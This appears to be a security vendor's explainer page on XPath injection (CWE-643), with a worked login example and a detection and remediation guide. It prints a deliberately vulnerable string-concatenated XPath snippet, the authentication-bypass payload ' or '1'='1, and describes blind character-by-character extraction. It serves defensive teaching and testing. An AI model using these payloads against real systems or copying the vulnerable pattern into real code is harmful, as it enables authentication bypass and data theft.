Vulnerability

XPath Injection
detect, understand, remediate

XPath injection manipulates queries against XML data stores by injecting filter syntax into unsanitised input. Login forms backed by XML user files, configuration lookups, and legacy enterprise apps that rely on XQuery or XPath expressions can leak the full document, bypass authentication, or surface admin-only nodes when input is concatenated into the query string.

Get Started Free

No credit card required. Free plan available forever.

Severity

High

CWE ID

CWE-643

OWASP Top 10

A03:2021 - Injection

CVSS 3.1 Score

9.1

What is XPath injection?

XPath injection (CWE-643) is an injection attack against applications that build XPath or XQuery expressions from user input without proper escaping. When an application stores data in XML files or queries an XML database, and constructs the lookup expression by concatenating untrusted input into the query string, an attacker can inject XPath syntax to alter the query logic, bypass authentication, or read parts of the document the application never intended to expose.

XPath is the query language for navigating XML documents, similar in spirit to how SQL queries a relational database. Where SQL injection manipulates a relational query, XPath injection manipulates the path expression that selects nodes from an XML tree. The same root cause applies: unparameterised string concatenation gives an attacker partial control over the syntax of the query, and the data store evaluates whatever the application hands it.

XPath injection still appears in pentests against legacy enterprise applications, XML-backed authentication forms, configuration management systems, content publishing pipelines, and integrations with SOAP services that lean on XPath inside business logic. The class is closely related to LDAP injection and NoSQL injection: the syntax differs but the root cause and the impact pattern are the same.

How it works

Find an XML-backed input

The attacker identifies endpoints that consume XML, expose user search, run XML-based authentication, or lean on configuration lookups against an XML file or database.

Probe with quote and predicate breaks

Single quotes, double quotes, brackets, and parentheses are sent in form fields and parameters. Verbose XPath errors, blank responses, or shifted result sets reveal that the input is concatenated into a query rather than escaped.

Inject the predicate manipulation

A payload such as a closing quote followed by an or 1=1 predicate rewrites the XPath expression so it matches every node in the document, regardless of the original filter.

Bypass auth or extract the document

The reshaped query authenticates as the first user in the file, extracts admin-only nodes, or, in blind cases, lets the attacker walk the document one character at a time using string-length and substring comparisons.

A worked example

The pattern is easiest to read against an XML user file used for login. The application stores users in a document like the one below.

<users>
  <user>
    <name>alice</name>
    <password>s3cret</password>
    <role>user</role>
  </user>
  <user>
    <name>admin</name>
    <password>r00tpw</password>
    <role>admin</role>
  </user>
</users>

The login handler concatenates the submitted username and password into an XPath expression that fetches a matching user node.

// Vulnerable: string-concatenated XPath
const expr = "//user[name/text()='" + username +
             "' and password/text()='" + password + "']";
const match = doc.evaluate(expr, doc, null, XPathResult.ANY_TYPE, null);

An attacker submits a username of ' or '1'='1 and any password. The query is rebuilt as:

//user[name/text()='' or '1'='1' and password/text()='anything']

The predicate becomes always-true and matches the first user node in the document, which the application then treats as the authenticated user. The same shape covers blind XPath injection, where the attacker uses string-length and substring functions to enumerate nodes one character at a time when the application only confirms whether a query matched anything.

Common causes

String concatenation in XPath expressions

Building XPath or XQuery expressions by gluing user input directly into the query string. The same anti-pattern that produces SQL injection produces XPath injection in XML-backed apps.

XML files used as auth or config stores

Legacy applications that authenticate against an XML user file, or that read business rules from XML configuration, often pre-date the move to parameterised queries and have never been refactored.

XQuery and SOAP endpoints

XQuery against native XML databases (Saxon, BaseX, MarkLogic) and SOAP services that include XPath in their stored procedures expose the same class of bug under a different name.

Verbose XPath error messages

Default error pages that surface the raw XPath expression and the parser exception give attackers the exact syntax to manipulate, accelerating exploitation from probe to working payload.

How to detect it

Automated detection

SecPortal's code scanning flags string-concatenated XPath, XQuery, and SOAP query construction in source so the bug is caught before the application ships.
Authenticated DAST sends quote-breaking, predicate-injecting, and boolean-shifting payloads against form inputs and parameters, then compares responses for length, status, and timing differences that suggest filter manipulation.
Error fingerprinting catches XPath-specific exceptions (parser errors, expected token messages, namespace warnings) leaking through default error handlers, which usually means the input reaches an unparameterised query.

Manual testing

Submit a single quote, then a double quote, in every input that drives a lookup or login. A 500 response, a verbose XPath error, or a shifted result set is the first signal the input is concatenated into the query.
Try an always-true predicate such as ' or '1'='1 and an always-false predicate such as ' or '1'='2. A diverging response between the two confirms the predicate is reaching the parser.
For blind cases, use string-length() and substring() in the predicate to walk a target node one character at a time, validating each guess against a true or false response shape.

How to fix it

Use parameterised XPath APIs

Most XPath implementations support variable bindings. In Java, javax.xml.xpath supports XPathVariableResolver. In .NET, XPathExpression.SetContext can attach a custom IXsltContextVariable. In XQuery, declare external variables and bind them at execution time. Pass user input as a bound variable rather than embedding it in the expression string.

Escape on the way in if you cannot parameterise

When a legacy library does not support binding, escape single quotes by switching them to numeric character references (') or by using XPath concat() to assemble strings that contain quote characters. Strict allowlists on input characters are a defensible last resort, but escaping or parameterising is preferable.

Validate input against a tight schema

Reject input that violates an explicit type or length contract before it reaches the query. A username field that accepts XPath syntax characters is a missing input contract, not a query bug. The validation belongs as close to the boundary as the query.

Suppress verbose error output

Default exception handlers should not return parser errors, namespace mismatches, or evaluation traces to the user. Log them server-side. Verbose XPath errors are often the difference between a probe and a working exploit.

Move sensitive data off plain XML files

Authentication and authorisation rules stored as flat XML are a long-standing anti-pattern. Migrating to a hashed credential store (or, at minimum, a database with parameterised queries) eliminates the exposure XPath injection trades on, and removes the legacy file from the threat model entirely.

Reporting an XPath injection finding

XPath injection findings carry the most weight when the report names the exact endpoint, the input that reached the query, the payload that demonstrated the predicate manipulation, and the data the manipulated query returned. A finding written as "XPath injection in login form" with no payload and no extracted node is hard for engineering to reproduce and easy to dispute. A finding written with the request, the response, and the proof-of-concept extraction reads as a working exploit.

On a SecPortal engagement, the finding sits on the engagement record with the affected endpoint, the CVSS 3.1 vector (typically high to critical depending on what the document holds), the CWE-643 mapping, the request and response evidence, and the remediation guidance. Pentest engagement records keep the proof of concept and the retest verification on the same finding, so the close-out conversation references the original payload rather than reconstructing it from email. The finding triage workflow covers how to separate scanner-derived signals from manually validated XPath findings during the testing window.

Compliance impact

OWASP Top 10

A03:2021 Injection

OWASP ASVS

V5.3 Output Encoding and Injection

PCI DSS

Req. 6.2 Secure Development Practices

ISO 27001

A.8.28 Secure Coding Practices

A pentester checklist for XPath injection

The list below is the minimum coverage a tester should walk before declaring an XML-backed surface clear of XPath injection.

Inventory every input that reaches an XML data store, an XQuery endpoint, or a SOAP service that uses XPath inside its handlers.
Probe each input with quote and bracket characters, then look for parser errors, blank responses, status changes, or shifted result sets.
Test always-true and always-false predicates side by side. A diverging response shape is the strongest signal for an exploitable filter.
For blind cases, build a string-length and substring oracle and walk the document one character at a time. Capture the full extracted node as evidence.
Where authentication is XML-backed, verify whether the predicate manipulation also returns the password node, the role, or the session attributes the application uses for authorisation.
Record the CVSS vector, the CWE-643 mapping, the request and response evidence, and the affected file path or service so the finding is reproducible at retest.

Related vulnerabilities

SQL Injection

LDAP Injection

NoSQL Injection

XML External Entity (XXE) Injection

Authentication Bypass

Related features

Test web apps behind the login

Find vulnerabilities before they ship

Vulnerability management software that tracks every finding

Catch XPath injection before the report ships

SecPortal probes XML-backed inputs with quote-breaking and predicate-injection payloads, flags string-concatenated XPath in source, and keeps proof of concept attached to the finding through retest. Start free.